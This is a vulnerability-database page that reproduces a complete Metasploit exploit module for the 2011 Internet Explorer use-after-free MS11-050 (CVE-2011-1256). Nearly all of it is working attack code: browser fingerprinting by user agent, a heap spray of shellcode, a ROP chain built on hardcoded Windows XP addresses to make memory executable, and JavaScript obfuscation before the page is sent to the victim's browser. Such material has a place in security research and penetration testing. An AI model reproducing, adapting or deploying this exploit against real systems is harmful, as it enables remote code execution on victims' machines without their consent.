Vulners
Lucene search
MS11-050 IE mshtml!CObjectElement Use After Free
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Internet Explorer DOM Modification Remote Code Execution (MS11-050; CVE-2011-1256) | 14 Jun 201100:00 | – | checkpoint_advisories |
 | CVE-2011-1256 | 16 Jun 201120:21 | – | cve |
 | CVE-2011-1256 | 16 Jun 201120:21 | – | cvelist |
 | Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit) | 17 Jun 201100:00 | – | exploitdb |
 | MS11-050: Cumulative Security Update for Internet Explorer: June 14, 2011 | 14 Jun 201100:00 | – | mskb |
 | CVE-2011-1256 | 16 Jun 201120:55 | – | nvd |
 | Microsoft Internet Explorer Multiple Vulnerabilities (2530548) | 15 Jun 201100:00 | – | openvas |
| Microsoft Internet Explorer Multiple Vulnerabilities (2530548) | 15 Jun 201100:00 | – | openvas |
 | MS11-050 IE mshtml!CObjectElement Use After Free | 17 Jun 201100:00 | – | packetstorm |
 | Memory corruption | 16 Jun 201120:55 | – | prion |
10
##
# $Id: ms11_050_mshtml_cobjectelement.rb 12962 2011-06-17 01:56:20Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "7.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil,
})
def initialize(info={})
super(update_info(info,
'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",
'Description' => %q{
This module exploits a use-after-free vulnerability in Internet Explorer. The
vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover
where the object tag should be when rendered (due to their styles/positioning). The
mshtml!CObjectElement is then freed from memory because it is invalid. However, the
mshtml!CDisplay object for the page continues to keep a reference to the freed <object> and
attempts to call a function on it, leading to the use-after-free.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 12962 $",
'Author' =>
[
'd0c_s4vage',
],
'References' =>
[
['CVE', '2011-1256'],
['OSVDB', '72948'],
['MSB', 'MS11-050'],
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
# In IE6 the mshtml!CObjectElement size is 0xac
[
'Win XP SP3 Internet Explorer 7', # 7.0.5730.13
{
# sizeof(mshtml!CObjectElement)
'FreedObjSize' => 0xb0,
'FakeObjCount' => 0x4000,
'FakeObjCountKeep' => 0x2000,
'ForLoopNumObjects' => 3,
'FreedObjOverwritePointer'=>0x0c0c0c0c,
'FreedObjOffsetAlignSize'=>0,
'ROP' => false,
}
],
[
'Win XP SP3 Internet Explorer 8 (no DEP)', # 8.0.6001.18702
{
# sizeof(mshtml!CObjectElement)
'FreedObjSize' => 0xe0, # 0xdc rounded up
'FakeObjCount' => 0x8000,
'FakeObjCountKeep' => 0x3000,
'ForLoopNumObjects' => 5,
'FreedObjOverwritePointer'=>0x0c0c0c0c,
'FreedObjOffsetAlignSize'=>0,
'ROP' => false,
}
],
[
'Win XP SP3 Internet Explorer 8',
{
'FreedObjSize' => 0xe0, # 0xdc rounded up
'FakeObjCount' => 0x8000,
'FakeObjCountKeep' => 0x3000,
'ForLoopNumObjects' => 5,
'FreedObjOverwritePointer'=>0x0c0c0c0c,
'FreedObjOffsetAlignSize'=>2,
#'StackPivot'=>0x773E3F18, # xchg eax,esp / ret - comctl32.dll
'StackPivot' => 0x7E45F257, #xchg eax,esp - USER32.dll
'ROP' => true,
}
],
[
'Debug Target (Crash)', {}
],
],
'DisclosureDate' => "Jun 16 2011",
'DefaultTarget' => 0))
end
def auto_target(cli, request)
agent = request.headers['User-Agent']
if agent =~ /MSIE 8\.0/
mytarget = targets[3] # IE 8
elsif agent =~ /MSIE 7\.0/
mytarget = targets[1]
else
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
end
mytarget
end
# 3/22/2011
# fully patched x32 WinXP SP3, IE 8.0.6001.18702
def winxp_sp3_rva
{
#"kernel32!VirtualAlloc" => 0x7c809af1,
"kernel32!VirtualAlloc" => 0x7c809ae1,
"ntdll!memcpy" => 0x7c901db3,
}
end
def compile_rop(rop_stack)
rva = winxp_sp3_rva()
num_random = 0
rop_stack.map do |rop_val|
case rop_val
when String
if rop_val == "random"
# useful for debugging
# num_random += 1
# 0xaabbcc00 + num_random
rand(0xffffffff)
else
raise RuntimeError, "Unable to locate key: #{rop_val.inspect}" unless rva[rop_val]
rva[rop_val]
end
when Integer
rop_val
else
raise RuntimeError, "unknown rop_val: #{rop_val.inspect}, #{rop_val.class}"
end
end.pack("V*")
end
def on_request_uri(cli, request)
mytarget = target
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
unless mytarget
send_not_found(cli)
return
end
end
@mytarget = mytarget
@debug = true if mytarget == targets[4]
return if ((p = regenerate_payload(cli)) == nil)
id_name = rand_text_alpha(5)
dir_name = rand_text_alpha(3)
if @debug
data = <<-DATA
<html>
<body>
<script language='javascript'>
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'></object>";
document.body.innerHTML += "<a id='#{id_name}' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' ></a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='#{dir_name}'></strong>";
</script>
</body>
</html>
DATA
print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
send_response(cli, data, { 'Content-Type' => 'text/html' })
return
end
raw_shellcode = payload.encoded
shellcode = Rex::Text.to_unescape(raw_shellcode, Rex::Arch.endian(mytarget.arch))
spray = nil
rop_shellcode_spray = nil
obj_overwrite_ptr = [@mytarget['FreedObjOverwritePointer']].pack("V")
if @mytarget['ROP']
rop_stack = []
0x1f.times do |i|
rop_stack << "random"
end
idx = -1
idx += 1 ; rop_stack[idx] = "kernel32!VirtualAlloc" # 1:
idx += 1 ; rop_stack[idx] = "ntdll!memcpy" # 2:ret 10 to this after VirtualAlloc
idx += 1 ; rop_stack[idx] = 0x7f000000 # 1:VirtualAlloc:lpAddress
idx += 1 ; rop_stack[idx] = 0x4000 # 1:VirtualAlloc:dwSize
idx += 1 ; rop_stack[idx] = (0x1000 | 0x2000) # 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
idx += 1 ; rop_stack[idx] = 0x40 # 1:VirtualAlloc:flProtect rwx
idx += 1 ; rop_stack[idx] = 0x7f001000 # 3:into this after memcpy
idx += 1 ; rop_stack[idx] = 0x7f001000 # 2:memcpy:dst
idx += 1 ; rop_stack[idx] = 0x23000100 # 2:memcpy:src
idx += 1 ; rop_stack[idx] = 0x2fff # 2:memcpy:size
# align the rest of it
back = rop_stack.slice!((rop_stack.length-1)-2, rop_stack.length)
rop_stack = back + rop_stack
rop_stack << @mytarget['StackPivot']
# align the stack for 0c0c0c0c
front = rop_stack.slice!(0, 19)
rop_stack = rop_stack + front
# resolve strings in the rop_stack array (kernel32!VirtualAlloc, random, etc)
rop = compile_rop(rop_stack)
nops = make_nops(0x1000 - raw_shellcode.length)
nops = Rex::Text.to_unescape(nops, Rex::Arch.endian(mytarget.arch))
#spray up to 0x23000000
rop_shellcode_spray = <<-JS
var shellcode = unescape("#{shellcode}");
var nops = unescape("#{nops}");
while(nops.length < 0x1000) nops += nops;
var shell_heapblock = nops.substring(0, 0x800-shellcode.length) + shellcode;
while(shell_heapblock.length < 0x40000) shell_heapblock += shell_heapblock;
var shell_finalspray = shell_heapblock.substring(0, (0x20000-6)/2);
for(var shell_counter = 0; shell_counter < 0x1000; shell_counter++) { heap_obj.alloc(shell_finalspray); }
JS
spray = rop
shellcode = ""
else
spray = obj_overwrite_ptr
end
spray = Rex::Text.to_unescape(spray, Rex::Arch.endian(mytarget.arch))
js = <<-JS
heap_obj = new heapLib.ie(0x20000);
var heapspray = unescape("#{spray}");
while(heapspray.length < 0x1000) heapspray += heapspray;
var shellcode = unescape("#{shellcode}");
var heapblock = heapspray.substring(0, (0x800-shellcode.length)) + shellcode;
var offset = #{[targets[1], targets[2]].include?(@mytarget) ? "0x400" : "0"};
var front = heapblock.substring(0, offset);
var end = heapblock.substring(offset);
heapblock = end + front;
while(heapblock.length < 0x20000) heapblock += heapblock;
finalspray = heapblock.substring(0, (0x10000-6)/2);
for(var counter1 = 0; counter1 < 0x1000; counter1++) { heap_obj.alloc(finalspray); }
#{rop_shellcode_spray}
var obj_overwrite = unescape("#{Rex::Text.to_unescape(obj_overwrite_ptr, Rex::Arch.endian(mytarget.arch))}");
while(obj_overwrite.length < #{@mytarget['FreedObjSize']}) { obj_overwrite += obj_overwrite; }
obj_overwrite = obj_overwrite.slice(0, (#{@mytarget['FreedObjSize']}-6)/2);
for(var num_objs_counter = 0; num_objs_counter < #{@mytarget['ForLoopNumObjects']}; num_objs_counter++) {
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
}
for(var counter4 = 0; counter4 < #{@mytarget['FakeObjCountKeep']}; counter4++) { heap_obj.alloc(obj_overwrite, "keepme1"); }
for(var counter5 = 0; counter5 < #{@mytarget['FakeObjCountKeep']}; counter5++) { heap_obj.alloc(obj_overwrite, "keepme2"); }
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAA";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
JS
js = heaplib(js)
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
html = <<-HTML
<html>
<body>
<script language='javascript'>
#{js}
</script>
</body>
</html>
HTML
print_status("Sending exploit for #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2011 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.41477